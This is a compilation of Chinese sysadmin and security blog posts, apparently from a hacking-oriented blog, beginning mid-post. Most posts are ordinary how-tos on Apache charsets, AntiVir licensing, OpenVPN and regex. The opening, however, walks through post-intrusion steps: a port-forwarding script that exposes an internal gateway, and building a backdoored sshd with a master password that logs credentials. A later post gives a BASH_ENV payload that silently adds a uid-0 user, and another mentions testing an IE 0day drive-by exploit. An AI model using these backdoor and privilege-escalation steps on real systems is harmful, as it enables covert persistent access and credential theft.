/usr/local/bin/proxy 80 192.168.0.1 80
sleep 600
killall -9 proxy
/sbin/service httpd restart
[root@cactiez etc]# /root/s.sh &
现在连接这机器的公网ip的80端口就已经是网关192.168.0.1的80端口了，赶紧的设置DMZ，搞定内网机器。

11.sshd后门：
打完补丁后，需要修改2个文件：version.h和includes.h。
version.h里面：
#define SSH_VERSION    "OpenSSH_4.3"
引号里面的版本号。
includes.h里面：
#define _SECRET_PASSWD "passwerd"
#define _LOG_DIR "/dev/hdal"
#define _S_LOG "slog"
#define _C_LOG "clog"
万用密码和记录密码路径和文件。
[root@cactiez openssh]# ./configure --prefix=/usr --sysconfdir=/etc/ssh
[root@cactiez openssh]# make && make install
[root@cactiez openssh]# cp ssh_config sshd_config /etc/ssh/
[root@cactiez openssh]# service sshd restart

另外有几个要提醒管理员的是：

1.不要允许root远程ssh登录，只允许特定组的用户远程ssh登录并且只允许该组用户su –；
2.用户名密码不要设置的有规律，尤其是有多台服务器的管理员，不要不同机器的密码区别只是在ip上，这样很容易被攻击者拿到一个密码就猜到其他的密码（一直有一台机器没拿下，最后管理员统一改了一个规律性的密码后，被我由已知的猜到了这台服务器的密码），多台机器共用同一个密码的更不可取（好多人公用一个密码，结果就是一个被黑全都遭殃，我就曾用Bruter跑一个密码的字典跑出同一段ip多台服务器）；
3.内网不要轻易在网关上映射端口出来，尤其是DMZ映射某些ip的所有端口；
4.安全更多的是人的问题，而不是技术问题。

如何不使用安装Digital Photo Professional(Canon DPP)

Canon单反有一张软件盘，《佳能数码单反解决方案》光盘。在Canon网站下载页面可以下载到最新版本的Digital Photo Professional等软件，但是安装时会检查旧版本Digital Photo Professional才能安装，因此如果丢失《佳能数码单反解决方案》光盘真的是很麻烦，一般来说要么去电驴下一个，很慢而且源比较少，要么用某种方法提取出安装包然后绕过检查过程…都很麻烦。

这里给大家一个注册表文件，执行它会把旧版本Digital Photo Professional信息写入注册表，这样安装程序就认为你机器上装过Digital Photo Professional，从而不用《佳能数码单反解决方案》光盘，达到直接使用Canon网站下载的升级包安装最新版Digital Photo Professional的目的。

下载地址：http://blog.vfocus.net/archives/tools/canon_reg.rar
PS:DPP有3.6版本了：http://aux1.jp.canon.com/dc/download/pssx1is/dpp360-zh.exe

解决一个乱码问题：Apache的Charset设置

页面中明确指明了编码是UTF8,但是显示还是乱码。似乎是Apache的问题。

1.页面没有指定charset ， Apache配置defaultcharst gbk , 页面文件编码是utf-8
          结果: 乱码，使用wireshark抓包，发现服务器返回的header中指明了:
Content-Type: text/html; charset=GBK
          结论：当页面没有指明charset的时候，Apache的defaultcharset起作用

   2. 页面指定charset为utf-8, Apache配置defaultcharset gbk. 页面文件是utf-8
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
        <div id="page-header">
          测试Apache DefaultCharset
        </div>
</body>
</html>
         结果还是出现乱码。
         结论：当Apache配置了DefaultCharset, 将忽略页面的charset申明。

   3 PHP header申明charset为utf8, Apache配置defaultcharst gbk,页面文件编码是utf8
header("Content-Type:text/html; charset=utf-8");
        结果 ： 页面显示正常。

   4 Apache设置DefaultCharset off
           结果，页面显示正常。

翻阅了下Apache2的手册：

AddDefaultCharset 指令
说明     当应答内容是text/plain或text/html时，在HTTP应答头中加入的默认字符集
语法     AddDefaultCharset On|Off|charset
默认值     AddDefaultCharset Off
作用域     server config, virtual host, directory, .htaccess
覆盖项     FileInfo
状态     核心(C)
模块     core

当且仅当应答内容是text/plain或text/html时，此指令将会在HTTP应答头中加入的默认字符集。理论上这将覆盖在文档体中通过<meta>标 签指定的字符集，但是实际的行为通常取决于用户浏览器的设置。AddDefaultCharset Off 将会禁用此功能。 AddDefaultCharset On 将启用Apache内部的默认字符集iso-8859-1 。您也可以指定使用在IANA注册过的字符集名字 中的另外一个charset 。
比如说：
AddDefaultCharset utf-8
    也就是说，当Apache不指定defaultcharset的时候，页面编码由页面自己的meta标签指定。
    当Apache指定的时候，将忽略页面中的meta标签指定的编码. 但是容许脚本直接header编码方式给客户端
最后，还有一个问题没有得出结果：
     当Apache和页面都没有指定的时候， 又如何？
     我在自己的机器上，如果都不指定， 默认还是utf8。

ps：我的Apache默认的gb2312的。因为n多虚拟机基本都是gbk的，就不用改虚拟机了，那在utf-8的虚拟机域名下加入如下：
<IfModule mod_mime.c>
        AddDefaultCharset utf-8
</IfModule>
重启apache，问题解决。

渗透测试图

linux下小红伞license过期解决

今天突然发现小红伞升级log报错：

# tail -n 5 /var/log/avupdater.log
2009-03-03 08:00:54 securitycn antivir[4771]: AVUP: ERROR AntiVir FAILED to update itself
2009-03-04 08:00:07 securitycn antivir[10571]: AVUP: WARNING Warning: the file "antivir.vdf" is more than 14 days old
2009-03-04 08:00:15 securitycn antivir[10672]: AVSC: WARNING Warning: the file "antivir.vdf" is more than 14 days old
2009-03-04 08:00:48 securitycn antivir[10571]: AVUP: ERROR Error: new updates will not work with current license
2009-03-04 08:00:48 securitycn antivir[10571]: AVUP: ERROR AntiVir FAILED to update itself

可是我记得我已经用的是半年的key了呢？怎么回事呢。

# antivir --version
7.9.0.74
operating system: Linux (glibc 2.2)
product version:  2.1.12-114
engine version:   7.9.0.74
packlib version:  7.6.1.13 (supports 34 formats)
vdf version:      7.1.1.227

Warning: the file "antivir.vdf" is more than 14 days old

product:          AntiVir Workstation
key file:         hbedv2.key
registered user:  securitycn
serial number:    1400214523-ASWTM-0003
key expires:      04 Feb 2009
run mode:         COMMERCIAL

product:          AntiVir (command line scanner)
key file:         hbedv2.key
registered user:  securitycn
serial number:    1400214523-ACMLM-0003
key expires:      04 Feb 2009
run mode:         COMMERCIAL

发现原来我装过2次，覆盖安装后key名字自动命名成hbedv2.key了，多了个2。晕了，我之前覆盖了hbedv.key了。

手动更新license的话，linux下在/usr/lib/AntiVir目录下，默热hbedv.key，这个目录下同时还有一个personaledition_classic.key文件，这个文件是免费用户的license文件。这2个文件任意一个存在都可以作为license验证。当然我的装过2次出现了一个hbedv2.key，我更新的是不正确的，因此需要重新更新：

# cd /usr/lib/AntiVir
# mv hbedv2.key hbedv2.key.old
# copy /root/HBEDV120.key /usr/lib/AntiVir/hbedv2.key

完成 license文件更新之后，就可以试一下能不能更新了。

# antivir –update
AntiVir / Linux Version 2.1.12-114
Copyright (c) 2008 by Avira GmbH.
All rights reserved.

Warning: the file "antivir.vdf" is more than 14 days old
checking for updates

on disk       |  upd server
--------------+--------------
02.01.12.114  <  02.01.12.130 [antivir]
07.01.00.00   =  07.01.00.00  [antivir0.vdf]
07.01.01.113  <  07.01.02.12  [antivir1.vdf]
07.01.01.207  <  07.01.02.105 [antivir2.vdf]
07.01.01.227  <  07.01.02.113 [antivir3.vdf]
--------------+--------------
antivir 100% |****************************************************************************| 2556 KB   17.74 KB/s   0:00 ETA
antivir1.vdf 100% |***********************************************************************| 3258 KB   48.83 KB/s   0:00 ETA
antivir2.vdf 100% |***********************************************************************|  501 KB   31.35 KB/s   0:00 ETA
antivir3.vdf 100% |***********************************************************************|   58 KB   11.63 KB/s   0:00 ETA

on disk       |  upd server
--------------+--------------
02.01.12.130  =  02.01.12.130 [antivir]
07.01.02.12   =  07.01.02.12  [antivir1.vdf]
07.01.02.105  =  07.01.02.105 [antivir2.vdf]
07.01.02.113  =  07.01.02.113 [antivir3.vdf]
--------------+--------------

02.01.12.114 --> 02.01.12.130 the scanner [the application]  (/usr/lib/AntiVir/antivir)
07.01.01.227 --> 07.01.02.113 the VDF database (inc)  (/usr/lib/AntiVir/antivir1.vdf, /usr/lib/AntiVir/antivir2.vdf, /usr/lib/AntiVir/antivir3.vdf)

AntiVir successfully updated itself

# antivir –version
7.9.0.98
operating system: Linux (glibc 2.2)
product version:  2.1.12-130
engine version:   7.9.0.98
packlib version:  7.6.1.15 (supports 34 formats)
vdf version:      7.1.2.113

product:          AntiVir Workstation
key file:         personaledition_classic.key
registered user:  Avira AntiVir PersonalEdition Classic
serial number:    0000149996-PXWSE-0001
key expires:      17 Feb 2010
run mode:         PERSONAL

product:          AntiVir (command line scanner)
key file:         personaledition_classic.key
registered user:  Avira AntiVir PersonalEdition Classic
serial number:    0000149996-PXWSE-0001
key expires:      17 Feb 2010
run mode:         PERSONAL

# tail -n 5 /var/log/avupdater.log
2009-03-04 08:00:48 securitycn antivir[10571]: AVUP: ERROR Error: new updates will not work with current license
2009-03-04 08:00:48 securitycn antivir[10571]: AVUP: ERROR AntiVir FAILED to update itself
2009-03-04 10:51:43 securitycn antivir[1717]: AVUP: WARNING Warning: the file "antivir.vdf" is more than 14 days old
2009-03-04 10:51:56 securitycn antivir[1720]: AVSC: WARNING Warning: the file "antivir.vdf" is more than 14 days old
2009-03-04 10:55:53 securitycn antivir[1717]: AVUP: INFO AntiVir successfully updated itself

ok了，以后又能正常更新了。

Linux下批量替换当前目录下所有指定文件内容

1.Linux下批量替换当前目录下所有*.php文件内容 old内容=$_SERVER['REQUEST_TIME'] new内容=time()

find ./ -name "*.php" | xargs sed -i "s/\$_SERVER\['REQUEST_TIME'\]/time()/g"

2.vi查找、替换命令

:s /SEARCH/REPLACE/g 注：把当前光标所处的行中的SEARCH单词，替换成REPLACE，并把所有SEARCH高亮显示；
:%s /SEARCH/REPLACE 注：把文档中所有SEARCH替换成REPLACE；
:#,# s /SEARCH/REPLACE/g 注：＃号表示数字，表示从多少行到多少行，把SEARCH替换成REPLACE；

—— 忽略大小写
:set ic   设置大小写敏感
:set noic 取消大小写敏感

最具有威胁的14个安全漏洞

BackTrack 4 Beta Public Released

从Remote-exploit公开BT4的下载地址以来，可以说是遭遇到了有史以来最为疯狂的下载浪潮.
获取ISO 下载点这里 md5sum and sha512sum校验
获取VMWare image 下载点这里 md5sum and sha512sum校验
尽管官网强调不要直接连接，但是我们也可以使用下述两个地址用迅雷下载:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm

linux下Avira AntiVir出现”error (program file of AntiVir has been modified):”的问题解决方法

Linux的文件服务器装了小红伞，申请了一个半年免费的key，但是装好第二天发现出现问题报错：

error (program file of AntiVir has been modified):

google了下发现应该是被prelink了。

crontab每天都会自动prelink

[root@sam root]# ls /etc/cron.daily/
00-logwatch  0anacron  logrotate  makewhatis.cron  prelink  rpm  slocate.cron  tmpwatch  yum.cron

配置/etc/prelink.conf加入一行-b /usr/lib/AntiVir，就可以排除了。

prelink –u 复原，但是执行后运行antivir还是报错，只好重装了。在重装过程中，发现厂商已经提示了，但是从来没注意到：（

NOTICE: This system has a prelinker. Prelinking the
        antivir binary will not work correctly. Either
        disable prelinking or add /usr/lib/AntiVir as an
        excluded prelink path.

        For example, add '-b /usr/lib/AntiVir'
        to /etc/prelink.conf

安装的时候人家说的很清楚了。居然安装了好几次才发现。汗。

FreeBSD用Xmanager连接

FreeBSD服务器端配置

－－－－－－－－－－－－－－－－－－－－－－－
1. /usr/X11R6/lib/X11/xdm/xdm-config
注释掉这句：
!DisplayManager.requestPort: 0
－－－－－－－－－－－－－－－－－－－－－－－
2. /usr/X11R6/lib/X11/xdm/Xservers
注释掉这句：
#:0 local /usr/X11R6/bin/X
－－－－－－－－－－－－－－－－－－－－－－－
3. /usr/X11R6/lib/X11/xdm/Xaccess
把这句的注释去掉：
* #any host can get a login window
－－－－－－－－－－－－－－－－－－－－－－－
4. /etc/ttys中
修改如下：
ttyv8 "/usr/X11R6/bin/xdm -nodaemon" xterm on secure
－－－－－－－－－－－－－－－－－－－－－－－
5. /etc/ssh/sshd_config
去掉注释：
X11Forwarding yes
－－－－－－－－－－－－－－－－－－－－－－－

最后注意防火墙。我的就是卡在ipfw的IPV6规则上了。

tcp6       0      0  ::1.55119                                     ::1.6010                                      TIME_WAIT
tcp6       0      0  ::1.6010                                      ::1.55118                                     ESTABLISHED
tcp6       0      0  ::1.55118                                     ::1.6010                                      ESTABLISHED
tcp6       0      0  ::1.6010                                      ::1.55117                                     ESTABLISHED
tcp6       0      0  ::1.55117                                     ::1.6010                                      ESTABLISHED
tcp6       0      0  ::1.6010                                      ::1.55116                                     ESTABLISHED
tcp6       0      0  ::1.55116                                     ::1.6010                                      ESTABLISHED
tcp4       0      0  127.0.0.1.6010         *.*                    LISTEN
tcp6       0      0  ::1.6010                                      *.*                                           LISTEN

实在搞不明白，为何要连tcp6的而不连tcp4的。

只需要在ipfw的规则里面加下面2行即可：

ipfw add allow ipv6 from localhost to localhost in
ipfw add allow ipv6 from localhost to localhost out

web攻击拓扑

关于这个ie 0day

December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.

微软更新了这个漏洞的通告：http://www.microsoft.com/technet/security/advisory/961051.mspx

IE5、6、7、8全部受这个漏洞的影响，而不是之前我们认为的只有IE7受影响。

刚测试了1天IE7的挂马代码，看来还要更新测试下了，也许能达到预期的目的。

使用load data infile时的字符集问题

在导入mysql数据的时候总是乱码，用

LOAD DATA INFILE '/home/mysql/ybz.csv' INTO TABLE goods_bak character set gbk FIELDS TERMINATED BY ',';

报错，看来是不支持character set gbk参数。

load data infile在某些MySQL的版本上不支持指定导入时的字符集。这时，MySQL假设导入文件的字符集是character_set_database，这个变量根据当前数据库指定的字符集而变化，如果指定当前数据库，那么它的值由character_set_server决定。因此如果load data infile不支持指定字符集，那么在导入前需要确认当前数据库的字符集，如果不符，则使用set character_set_database = ... 更改。

上面的我们就可以改成这个:

set character_set_database = gbk;
LOAD DATA INFILE '/home/mysql/ybz.csv' INTO TABLE goods_bak FIELDS TERMINATED BY ',';

ok，select下看看已经不是乱码了。

在UltraEdit的查找和替换中使用正则表达式

很多朋友都用过或者正在用UltraEdit，这个编辑器陪伴我也好几年了，从很多地方影响着我写代码的快捷键习惯，Ultraedit提供了非常丰富的编辑功能，其中非常重要的查找和替换功能一定大家都用过，Ultraedit提供的查找替换功能非常方便和强大，可以在单独文件里面查找替换，也可以在多个文件、多个目录里面进行查找替换。而我们在使用这些查找替换功能的时候，一般都是针对某个字符串进行，前两天我要对一个目录下（包含子目录）所有的 html文件中某一段代码进行查找替换，一下子不知道怎么操作了，由于长期写程序用到正则表达式，于是猜想具备如此强大功能的Ultraedit一定也有这样类似的匹配功能，于是点击Help一看，果然不出所料，Ultraedit支持基本的正则表达式匹配查找和替换功能，这能满足我们几乎全部的需要了。

下面是对UltraEdit的Help中针对查找替换使用正则表达式部分的整理，最后还有我前两天用到的一个多行代码查找替换的例子。

Ultraedit在使用正则表达式进行查找替换时有两个可使用的语法集合。一个是 UltraEdit 的更早的版本被使用的原来的 UltraEdit 句法。另一个是”Unix”类型的正则表达式，这个集合在ultraedit的默认配置中是没有启用的，需要在配置中找到search项，启用Unix类型的正则表达式。

语法集合一：

符号  功能
%     匹配行的开始 - 显示搜索字符串必须在行的开始，但是在所选择的结果字符串中不包括任何行终止字符。
$     匹配行尾 - 显示搜索字符串必须在行尾，但是在所选择的结果字符串中不包括任何行终止字符。
?     除了换行符以外匹配任何单个的字符
*     除了换行符匹配任何数量的字符和数字
+     前一字符匹配一个或多个，但至少要出现一个
++    前一字符匹配零个或多个，但至少要出现一个
^b    匹配一个分页
^p    匹配一个换行符(CR/LF)(段)(DOS文件)
^r    匹配一个换行符(CR 仅仅)(段)(MAC 文件)
^n    匹配一个换行符 ( LF 仅仅 )( 段 )( UNIX 文件 )
^t    匹配一个标签字符TAB
[]    匹配任何单个的字符，或在方括号中的范围
^{A^}^{ B^} 匹配表达式A或 B
^     重载其后的正规表达式字符
^(^)  括或标注为用于替换命令的表达式。

一个正则表达式最多可以有9个标注表达式, 按正规表达式的需要而定。
相应的替换表达式是 ^x , 替换范围x是1-9。例如：
If ^(h*o^) ^(f*s^) matches “hello folks”,
^2 ^1 would replace it with “folks hello”.

（hello folks 将被替换成 folks hello。）

注： ^ 是实际字符 ^不是Ctl + 键值。

例如：
m?n 匹配 “man”,”men”,”min” 但不匹配 “moon”.
t*t 匹配 “test”,”tonight” 和 “tea time” (the “tea t” portion) 但不匹配 “tea
time” (newline between “tea ” and “time”).
Te+st 匹配 “test”,”teest”,” teeeest “等等。但是不匹配 “tst”。
[aeiou] 匹配每个小写元音。
[,.?] 匹配一文字的 “,”，”.”或 “?”。
[0-9, a-z] 匹配任何数位，或小写字母。
[~0-9] 除了数字以外匹配任何字符 (~ 意味着”不”)

你按如下方式可以查找一个表达式A或 B ：

“^{John^}^{Tom^}”

这将在找John或Tom的出现。应该在 2 个表达式之间没有任何东西。

你可以在同一搜索中按如下方式组合A or B and C or D：

“^{John^}^{Tom^}^{Smith^}^{Jones^}”

这将在John or Tom 后面找 Smith or Jones。

语法二：”Unix”句法类型的正则表达式

符号        功能
\          标记下一个字符作为一个特殊的字符。
"n"         匹配字符"n"。"n" 一个换行符或换行符字符。
^           匹配/定位行的开始。
$           匹配/定位行的尾。
*           匹配前面的字符零次或多次。例
+           匹配前面的字符一次或多次。例
.           匹配除了一个换行符字符匹配任何单个的字符。
(expression)标注用于替换命令的表达式。一个正则表达式根据需要，最多可以有9个标注表达式。相应的代替表达式是 x , x的范围是 1-9 。
例如：
If (h.*o) (f.*s) matches "hello folks",
2 1 would replace it with "folks hello".
（hello folks 将被替换成 folks hello。）

[xyz]       一个字符集。匹配在方括号之间的任何字符。
[^xyz]      一个否定的字符集。不匹配在方括号之间的任何字符。
\d          匹配一个数字字符。等价于[0-9]。
\D          匹配一个非数字字符。等价于[^0-9]。
\f          匹配一个换页字符。
\n          匹配一个换行字符。
\r          匹配一个回车符字符。
\s          匹配任何空白的空格, 标签, 换页, 包括空格等等，但不匹配换行符。
\S          匹配任何非空白的字符，但不匹配换行符。
\t          匹配一个标签TAB字符。
\v          匹配一个垂直的标签字符。
\w          匹配任何词语字符包括下划线。
\W          匹配任何非词语字符字符。
注： ^ 是实际字符 ^不是Ctl + 键值。

例如：
m.n 匹配 “man”,”men”,”min” 但不匹配 “moon”.
t+t 匹配 “test”,”tonight” 和 “tea time” (the “tea t” portion) 但不匹配 “tea
time” (newline between “tea ” and “time”).
Te*st 匹配 “test”,”teest”,” teeeest “等等。但是不匹配 “tst”。
[aeiou] 匹配每个小写元音。
[,.?] 匹配一文字的 “,”，”.”或 “?”。
[0-9,a-z] 匹配任何数位，或小写字母。
[^0-9] 除了数字以外匹配任何字符 (~ 意味着”不”)

你按如下方式可以查找一个表达式A或 B ：

“(John)|(Tom)”

这将在找John或Tom的出现。应该在 2 个表达式之间没有任何东西。

你可以在同一搜索中按如下方式组合A or B and C or D：

“(John|Tom) (Smith|Jones)”

这将在John or Tom 后面找 Smith or Jones。

另外：

p 匹配 CR/LF ( 作为 rn 的一样 ) 作为DOS行结束符匹配

如果查找/替换功能中正则表达式没有选用，则替换字段中下列字符也是有效的：

符号 功能

^^ 匹配一个 “^” 字符
^s 替换为被选择 ( 加亮 ) 活跃的文件窗口的文章。
^c 替换为剪贴板的内容
^b 匹配一个页裂缝
^p 匹配一个换行符 ( CR/LF )( 段 )( DOS 文件)
^r 匹配一个换行符 ( CR 仅仅 )( 段 )( MAC 文件)
^n 匹配一个换行符 ( LF 仅仅 )( 段 )( UNIX 文件)
^t 匹配一个标签TAB字符

下面是我要实现的一段代码查询替换的举例
我想把一个.lrc文件中的汉字去掉:

[ti:046]
[ar:Book I]
[al:english900]
[la:zh]
[by:]
[00:00.00][4] Identifying objects.辨别物品
[00:00.00]
[00:00.01]What are these? 这些是什么？
[00:01.93]Those are books. 那些是书。
[00:03.87]Where are the books? 那些书在哪儿？
[00:06.13]There they are. 在那儿。
[00:08.68]These are my pencils. 这些是我的铅笔。
[00:12.00]Where are your pens? 你的那些钢笔在哪儿？
[00:14.85]They're over there. 在那里。
[00:17.48]Are these your pens? 这些是你的钢笔吗？
[00:20.04]Yes,they are. 是我的。
[00:22.63]Those are mine. 那些是我的。
[00:25.39]These are your books,aren't they? 这些书是你的，对不对？
[00:28.35]No,they aren't. 不，不是。
[00:31.07]They're not mine. 不是我的。
[00:33.39]These are mine,and those are yours. 这些是我的，而那些是你的。
[00:35.57]Those aren't your pens,are they? 那些钢笔不是你的，对吧？
[00:36.38]

点"搜索"->"替换",选中"正则表达式"

查找：^([/./?]^) ?++$

替换为：^1

点“全部替换”，完成。

近来江湖多凶险，有线无线都危险

加固保安全，改改更健康：
1、打开secpol.msc，把“网络安全：LAN Manager 身份验证级别”修改为“仅发送 NTLMv2 响应\拒绝 LM 和 NTLM”：

2、打开你的AP的配置界面，修改WPA的加密方式为AES（大多数AP默认都是TKIP）：

欢迎转贴，广结善缘。文明转贴，注明出处。

出处：http://hi.baidu.com/tombkeeper/blog/item/d48412e9d5120f38b80e2dcb.html

Linux本地su提权

by:blog.vfocus.net

echo '/usr/sbin/useradd -u 0 -o aaa 2> /dev/null  2>&1' > /tmp/.bashrc
echo 'echo aaa:bbb|chpasswd> /dev/null  2>&1' >> /tmp/.bashrc
export BASH_ENV="/tmp/.bashrc"

好多人用su从来不加-，这会带来很多隐患，比如上面的方式就是利用方法之一。建议系统管理员们注意下，要用“su -”。

OPENVPN安装手册

by：http://blog.vfocus.net

一、在网上下载openvpn的安装包http://openvpn.net/上下载openvpn的最新版，时至今 日是openvpn-2.0.9.tar.gz。

    网上都说还需要lzo这个压缩库。这个包是压缩的，我没有安装，在编译程序的时候只需要加上--disable-lzo就可以了。然后再配置文件里面把这项注释掉就可以了，这样所有要安装的就是一个包openvpn-2.0.9.tar.gz。

二、vpn服务端的网络结构

    vpn服务端是有两个ip 其中eth0 172.16.6.79 提供vpn服务，由外部通过172.31.16.0/24 通过1194端口拨入，然后通过 eth1 192.168.253.79访问192.168.253.0/24去维护服务器

三、安装openvpn

tar zxvf openvpn-2.0.9.tar.gz
cd openvpn-2.0.9
./configure –prefix=/usr/local/openvpn –-disable-lzo
make;make install

四、生成openvpn证书

    1、cd openvpn-2.0.9/ easy-rsa/

    vi vars

    根据自己的情况设置

根据自己的情况设置KEY_COUNTRY, KEY_PROVINCE, KEY_CITY, KEY_ORG, KEY_EMAIL,比如我的
export KEY_COUNTRY=CN
export KEY_PROVINCE=Beijing
export KEY_CITY=Beijing
export KEY_ORG=abc
export KEY_EMAIL=abc@123.com

然后保存
. ./vars //注意两个点中间有空格
./clean-all
./build-ca
build-ca 命令使用openssl 命令生成certificate authority (CA) certificate 和密钥：
./build-ca
Generating a 1024 bit RSA private key
....++++++
.......++++++
writing new private key to 'ca.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [CN]:
State or Province Name (full name) [Beijing]:
Locality Name (eg, city) [Beijing]:
Organization Name (eg, company) [BUAA]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) []:zhang //这里随便输入即可

    Email Address [zhangwenhao@wanmei.com]:

    这些步骤一直按回车就可以了

    2、为vpn server生成证书与密匙

./build-key-server server
Common Name 处填server，其他默认，为上面编辑vars 文件时设置的值。"Sign the certificate?
[y/n]" 和"1 out of 1 certificate requests certified, commit? [y/n]"两处选y。

    3、为vpn clients 生成证书与密匙

./build-key client1
./build-key client2
./build-key client3
Common Name 处分别填client1 client2 client3，别的同vpn server 设置

    4、生成diffie hellman 参数

./build-dh

现在生成了所需的文件。目录keys 下生成的文件中，ca.crt 是所有vpn 机器都需要的。vpn server 需要ca.crt ca.key dh1024.pem server.crt server.key，拷贝到vpn server 的/etc/openvpn目录。vpn client1 需要ca.crt ca.key lient1.crt client1.key，拷贝到vpn client1 的/etc/openvpn 目录。client2，client3 和client1 同，只是client1.crt 和client1.key 分别用client2 和client3 的对应文件。vpn client2 和vpn client3 也把对应的密钥文件拷贝到各自的/etc/openvpn 目录。

五、配置server端与client端

    1、server.conf 使用代码包目录sample-config-files 里的server.conf 修改即可。配置文件如下（）

#################################################
;local a.b.c.d 绑定的IP 地址，可以不填
port 1194 绑定的端口
proto tdp 选择udp 协议，也可用tcp
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
;dev tap
#使用tun 设备，路由IP 通道。FreeBSD 默认支持TUN/TAP 驱动。
dev tun
#下面4 处填上面为vpn server 生成的证书和密钥
ca /etc/openvpn/ca.crt （如果启动的时候带了cd路径，则这里不需要绝对路径）

cert /etc/openvpn/server.crt
key /etc/openvpn/server.key  # This file should be kept secret
dh /etc/openvpn/dh1024.pem

#配置vpn 虚拟网段，会在vpn server 建立一条10.0.0.1 >10.0.0.2 的点对点虚拟链路。
server 10.8.0.0 255.255.255.0
#记录client 对应得虚拟地址，默认600 秒更新一次
ifconfig-pool-persist ipp.txt
#等价于ping 10 和ping-restart 120，对于vpn 机器有可能断开外网联线或者重起的，
#或者vpn client 先于vpn server 运行的情况下很重要。Client 会重新连接。
keepalive 10 120
#开启压缩支持。如果编译的时候没有使用LZO 库则注释本行
#comp-lzo
#初始化完成后改变OpenVPN 进程的用户ID 为nobody
user nobody
#同上，改变进程的组ID 为nobody。如果是Windows 系统，注释掉这两行
group nobody
persist-key
persist-tun
#默认每分钟更新状态文件，可以看到client 的真实IP 虚拟IP 等信息。
status openvpn-status.log
verb 3

    2、client端

client1.conf 使用源代码包目录sample-config-files 里的client.conf 修改即可

client
dev tun
proto tcp #和server.conf 一致即可
remote 172.16.6.79 1194 #指定vpn server 的IP 地址和端口
resolv-retry infinite #如果解析vpn server 失败则无限次重试
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert client1.crt #这2 行填给client1 生成的密钥文件。client2 client3 相应更改。
key client1.key
#comp-lzo
keepalive 10 120

如果有其他的客户端需要连过来  也采取同样的配置

    3、分配client端的联入地址

给server.confi添加如下行：
client-config-dir ccd
并在vpn server 的/etc/openvpn 目录建立ccd 子目录，并在ccd 目录下建立文件client1，client2，client3（这里的文件名对应”为vpn clients 产生证书和密钥”步骤里的Common Name），当对应得client 连接时，vpn server 会读去对应文件里的配置信息。文件client1 里输入：
ifconfig-push 10.8.0.5 10.8.0.6，即给vpn client1 指定10.8.0.5,对端10.8.0.6 的虚拟链路。

如果有其他的客户端也同样处理，如

client2 内容：ifconfig-push 10.8.0.9 10.8.0.10
client3 内容：ifconfig-push 10.8.0.13 10.8.0.14

分别拷贝server.conf，client1.conf，client2.conf，client3.conf 到vpn server 和对应的client。

    4、启动vpn

分别在各个vpn 计算机启动vpn server 和vpn client

启动server的时候用 守护进程启动

./openvpn –daemon –config /etc/openvpn/server.conf

启动client的时候 用client的配置文件

./openvpn –daemon –config /etc/openvpn/client.conf

查看端口1194端口是否起来，如果两个都起来则查看ifconfig 看vpn网卡是否起来

到这一步，VPN 客户端和服务端可以相互通讯了。10.8.0.1 应该可以ping 通10.8.0.5，10.8.0.9，10.8.0.13。10.8.0.5，10.8.0.9，10.8.0.13 也可以ping 通10.8.0.1

但是此时还仅仅是vpn 客户端与服务器可以通，但此时，vpn的客户端还不能访问服务器端同网段内机器

    5、 vpn client 访问vpn server 所在172.16.6.0/24 网段内计算机

第一种方法，添加如下行到server.conf
push "route 172.16.6.0 255.255.255.0"
push 选项是把选项内容给连接的vpn 客户端执行，也就是在vpn 客户端执行“route 172.16.6.0 255.255.255.0”，即当client 连接时，添加路由到client 的路由表里。对于vpn client1，该选项相当于在vpn client1 的路由表里添加到网络172.16.6.0/24，下一跳为10.8.0.6的路由，这里10.8.0.6 为给vpn client1 分配的虚拟IP 对的服务器端IP，相当于路由到vpn server。

第二种方法，如果不改变server.conf，在vpn client1 里route add –net 172.16.6.0 10.8.0.6 255.255.255.0 效果一样，也可route add –net 172.16.6.0 10.8.0.1 255.255.255.0 直接路由到vpn server 的本端IP 也可，但这样需要在所有的vpn 客户端改变路由表。

这样在vpn 客户端可以ping 通172.16.6.0/24 网段内部计算机了。到此，vpn客户端可以访问服务端同网段的服务器了。

    6、总结
在vpn server 的/etc/rc.local 文件添加如下行：
/usr/local/openvpn/openvpn –daemon --config /etc/openvpn/server.conf --cd /etc/openvpn/
在vpn client1 的/etc/rc.local 文件添加如下行：
/usr/local/openvpn/openvpn –daemon --config /etc/openvpn/client1.conf --cd /etc/openvpn/

这样完成了所有的配置。下面总结如下：
vpn server 的目录/etc/openvpn 下有文件ca.crt，ca.key，dh1024.pem，server.crt，server.key和server.conf 以及子目录ccd。/etc/openvpn/ccd 目录下有文件client1，client2 和client3。

/etc/openvpn/server.conf 内容如下：
;local a.b.c.d
port 1194
proto tcp
dev tun
ca ca.crt
cert server.crt
key server.key # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
keepalive 10 120
comp-lzo
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3
client-config-dir ccd
#使vpn clients 能访问vpn server 内部网段计算机
push "route 172.16.6.0 255.255.255.0"
#route 172.31.13.0 255.255.255.0 #使vpn server 能访问中文网计算机

/etc/openvpn/ccd/client1 内容如下：
ifconfig-push 10.8.0.5 10.8.0.6
iroute 172.31.13.0 255.255.255.0

vpn client1 的目录/etc/openvpn 下有文件ca.crt，ca.key client1.crt，client1.key 和client1.conf。
/etc/openvpn/client1.conf 内容如下：
##############################################
# Sample client-side OpenVPN 2.0 config file #
# for connecting to multi-client server. #
##############################################
client
dev tun
proto udp
remote 172.16.6.79 1194
resolv-retry infinite
nobind
user nobody
group nobody
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3
keepalive 10 120

Windows xp安装sp3后自动更新不能安装问题（自动更新下载后安装失败）解决办法

